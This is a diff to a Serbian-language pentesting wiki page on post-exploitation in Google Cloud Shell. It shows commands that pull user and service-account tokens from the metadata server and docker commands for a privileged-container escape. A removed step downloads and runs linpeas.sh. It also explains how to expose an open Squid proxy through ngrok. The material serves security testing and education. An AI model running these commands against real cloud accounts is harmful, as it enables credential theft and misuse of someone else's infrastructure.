diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
index 236bc55bc..16c6b8b9b 100644
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
@@ -10,40 +10,40 @@ Za više informacija o Cloud Shell pogledajte:
../gcp-services/gcp-cloud-shell-enum.md
{{#endref}}
-### Container Escape
+### Dobijanje korisničkog tokena iz metapodataka
-Imajte na umu da Google Cloud Shell radi unutar kontejnera — možete **easily escape to the host** tako što ćete uraditi:
+Samo pristupanjem serveru metapodataka možete dobiti token koji omogućava pristup kao trenutno prijavljeni korisnik:
+```bash
+wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
+```
+### Container Escape / Docker use
+
+> [!WARNING]
+> Prethodno je cloud shell radio u kontejneru sa pristupom docker socket-u hosta. Sada je Google promenio arhitekturu i cloud shell kontejner radi u "Docker in a container" podešavanju. Dakle, čak i ako je moguće koristiti docker iz cloud shell-a, nećete moći da pobegnete na host koristeći docker socket.
+> Imajte na umu da je prethodno fajl `docker.sock` bio lociran u `/google/host/var/run/docker.sock`, ali je sada premešten u `/run/docker.sock`.
-Container escape commands
+Docker use / Old container escape commands
```bash
-sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
-sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
-sudo docker -H unix:///google/host/var/run/docker.sock start escaper
-sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
+sudo docker -H unix:///run/docker.sock pull alpine:latest
+sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
+sudo docker -H unix:///run/docker.sock start escaper
+sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh
```
-Ovo google ne smatra ranjivošću, ali ti daje širi uvid u to šta se dešava u tom okruženju.
-
-Štaviše, obrati pažnju da sa hosta možeš pronaći token servisnog naloga:
+Štaviše, ranije je bilo moguće pronaći token za servisni nalog koji koristi cloud shell VM u metadata serveru:
-Get service account from metadata
+Stari servisni nalog iz metadata servera
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
```
-
-
Sa sledećim opsegima:
-
-
-
-Dobijte opsege servisnog naloga
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
@@ -53,37 +53,23 @@ https://www.googleapis.com/auth/monitoring.write
```
-Enumeriši metapodatke pomoću LinPEAS:
-
-
-
-Enumeriši metapodatke pomoću LinPEAS
-```bash
-cd /tmp
-wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
-sh linpeas.sh -o cloud
-```
-
-
-Nakon korišćenja [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) sa tokenom Service Account-a **nije otkrivena nijedna dozvola**...
-
### Koristite ga kao proxy
-Ako želite da koristite svoju google cloud shell instancu kao proxy, potrebno je da pokrenete sledeće komande (ili ih ubacite u .bashrc fajl):
+Ako želite da koristite vašu google cloud shell instancu kao proxy, morate da pokrenete sledeće komande (ili ih ubacite u .bashrc fajl):
-Instalirajte Squid proxy
+Instaliraj Squid proxy
```bash
sudo apt install -y squid
```
-Samo da znaš, Squid je HTTP proxy server. Kreiraj **squid.conf** fajl sa sledećim podešavanjima:
+Samo da znaš, Squid je HTTP proxy server. Napravi fajl **squid.conf** sa sledećim podešavanjima:
-Kreiraj squid.conf fajl
+Create squid.conf file
```bash
http_port 3128
cache_dir /var/cache/squid 100 16 256
@@ -92,11 +78,11 @@ http_access allow all
```
-kopirajte **squid.conf** datoteku u **/etc/squid**
+kopiraj fajl **squid.conf** u **/etc/squid**
-Kopirajte konfiguraciju u /etc/squid
+Kopiraj konfiguraciju u **/etc/squid**
```bash
sudo cp squid.conf /etc/squid
```
@@ -112,19 +98,19 @@ sudo service squid start
```
-Koristite ngrok da bi proxy bio dostupan izvana:
+Koristite ngrok da bi proxy bio dostupan izvan mreže:
-Izložite proxy koristeći ngrok
+Izložite proxy pomoću ngrok
```bash
./ngrok tcp 3128
```
-Nakon pokretanja kopirajte tcp:// url. Ako želite da pokrenete proxy iz browser-a, preporučuje se da uklonite tcp:// deo i port i stavite port u polje za port u browser proxy podešavanjima (squid je a http proxy server).
+Nakon pokretanja kopirajte tcp:// URL. Ako želite da pokrenete proxy iz pregledača, preporučuje se da uklonite tcp:// deo i port, i upišete port u polje za port u podešavanjima proxy-ja vašeg pregledača (squid je http proxy server).
-Za lakše korišćenje pri startovanju .bashrc fajl treba da sadrži sledeće linije:
+Za bolje korišćenje pri pokretanju, fajl .bashrc treba da sadrži sledeće linije:
@@ -137,6 +123,6 @@ cd ngrok;./ngrok tcp 3128
```
-Uputstva su kopirana sa [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Pogledajte tu stranicu za druge lude ideje kako da pokrenete bilo koji softver (baze podataka pa čak i Windows) u Cloud Shell.
+Instrukcije su kopirane sa [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Proverite tu stranicu za druge lude ideje kako pokrenuti bilo koji softver (baze podataka pa čak i Windows) u Cloud Shell.
{{#include ../../../banners/hacktricks-training.md}}